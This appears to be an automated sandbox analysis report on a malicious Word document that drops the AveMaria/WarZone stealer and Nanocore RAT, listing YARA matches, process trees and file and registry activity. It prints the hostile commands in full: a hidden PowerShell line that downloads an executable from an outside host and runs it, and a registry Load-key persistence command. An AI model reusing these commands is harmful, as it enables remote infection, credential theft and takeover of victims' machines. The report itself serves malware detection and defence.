Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2100943704.0000000000360000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2099841469.0000000000390000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: microA[1].exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.11.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.12.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: images.exe.16.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@44/32@14/2
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 16_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 17_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 18_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 25_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 16_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize, 16_2_004148B6
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA, 16_2_00415169
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 16_2_0040D33C
Source: C:\Users\user\AppData\Local\Temp\microA.exe File created: C:\Program Files\Microsoft DN1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$0-MR 311.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBE6.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\microA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\ProgramData\images.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\microA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\images.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: N40-MR 311.doc Virustotal: Detection: 43%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'
Source: unknown Process created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '00000000000005F4' '00000000000005E4'
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe C:\Users\user\AppData\Roaming\JhwfHBtD..exe
Source: unknown Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Windows\System32\verclsid.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\images.exe File written: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Users\user\AppData\Local\Temp\microA.exe Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB* source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: images.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2100227357.0000000001FB0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103552908.0000000002420000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb$ source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: microA[1].exe.0.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.3.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.10.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 10.0.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 10.2.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.11.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.12.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.microA.exe.60000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: images.exe.16.dr, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.2.microA.exe.cb0000.3.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.microA.exe.cb0000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.microA.exe.cb0000.3.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.microA.exe.cb0000.0.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.2.microA.exe.cb0000.3.unpack, h.cs .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Suspicious powershell command line found
